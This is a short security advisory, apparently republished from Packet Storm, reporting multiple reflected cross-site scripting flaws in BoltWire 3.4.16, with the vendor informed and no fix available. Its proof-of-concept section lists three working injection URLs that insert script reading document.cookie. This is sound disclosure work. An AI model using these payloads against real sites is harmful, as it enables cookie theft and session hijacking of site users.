BoltWire version 3.4.16 suffers from multiple cross site scripting vulnerabilities.
b26de03dfb9407f0a2f9ba30fb3b2656730b6ffbde8968b4bd2d8206761a7edeAdvisory: BoltWire 3.4.16 Multiple XSS vulnerabilities
Advisory ID: SSCHADV2012-001
Author: Stefan Schurtz
Affected Software: Successfully tested on BoltWire 3.4.16
Vendor URL: http://www.boltwire.com/
Vendor Status: informed
==========================
Vulnerability Description
==========================
BoltWire 3.4.16 is prone to multiple XSS vulnerabilities
==================
PoC-Exploit
==================
http://[target]/bolt/field/index.php?p=main&help='"</script><script>alert(document.cookie)</script>
http://[target]/bolt/field/index.php?"</a><script>alert(document.cookie)</script></
http://[target]/bolt/field/index.php?p=main&action='"</a><script>alert(document.cookie)</script></&file=file.jpg
=========
Solution
=========
-
====================
Disclosure Timeline
====================
01-Jan-2012 - vendor informed
01-Jan-2012 - vendor feedback
15-Jan-2012 - no fix available
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-001.txt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed